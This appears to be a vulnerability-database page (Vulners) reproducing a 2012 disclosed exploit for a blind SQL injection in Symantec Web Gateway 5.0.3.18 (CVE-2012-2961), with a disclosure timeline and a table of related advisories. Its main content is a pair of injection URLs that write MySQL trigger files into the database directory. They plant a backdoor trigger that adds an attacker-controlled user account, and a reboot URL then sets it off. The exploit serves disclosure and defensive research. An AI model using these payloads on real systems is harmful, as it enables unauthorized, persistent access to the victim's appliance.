Vulners
Lucene search
Symantec Web Gateway 5.0.3.18 Blind SQL Injection
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2012-2961 | 23 Jul 201200:00 | – | circl |
 | Symantec Web Gateway ldap_latest.php Blind SQL Injection - Ver2 (CVE-2012-2961) | 7 Jan 201400:00 | – | checkpoint_advisories |
| Symantec Web Gateway ldap_latest.php Blind SQL Injection - Ver2 (CVE-2012-2961) | 3 Feb 201400:00 | – | checkpoint_advisories |
 | CVE-2012-2961 | 23 Jul 201217:00 | – | cve |
 | CVE-2012-2961 | 23 Jul 201217:00 | – | cvelist |
 | Symantec Web Gateway 5.0.3 SQLi | 20 Jan 201300:00 | – | dsquare |
 | EUVD-2012-2939 | 7 Oct 202500:30 | – | euvd |
 | CVE-2012-2961 | 23 Jul 201217:55 | – | nvd |
 | Symantec Web Gateway Multiple Vulnerabilities | 24 Jul 201200:00 | – | openvas |
 | Sql injection | 23 Jul 201217:55 | – | prion |
10
`######################################################################################
# Exploit Title: Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers
# Date: Jul 23 2012
# Author: muts
# Version: Symantec Web Gateway 5.0.3.18
# Vendor URL: http://www.symantec.com
#
# Timeline:
#
# 12 Jun 2012: Vulnerability reported to CERT
# 22 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec issued patch: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
#
######################################################################################
Accessing the following URLs will create a new trigger that will create a user account on the victim database:
https://server/spywall/ldap_latest.php?ip=1 union select 'TYPE=TRIGGERNAME' into outfile '/var/lib/mysql/spywall_db/ins_trig.TRN' LINES TERMINATED BY '\ntrigger_table=eventlog\n';--
https://server/spywall/ldap_latest.php?ip=1 union select 'TYPE=TRIGGERS' into outfile '/var/lib/mysql/spywall_db/eventlog.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`shadm`@`localhost` trigger ins_trig after insert on eventlog\\nfor each row\\nbegin\\nINSERT INTO users VALUES("muts","21232f297a57a5a743894a0e4a801fc3","NULL","4773","2","3","N/A","0","0","0","","[email protected]","1336255408","0","0","0");\\nend\'\nsql_modes=0\ndefiners=\'shadm@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';--
With the MySQL trigger in place, an authenticated user can initiate a reboot of the remote system by accessing the following URL. When a user logs back in to the application, the trigger will be activated and the new user will be added to the system.
https://server/spywall/scheduledReboot.php
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jul 2012 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.01174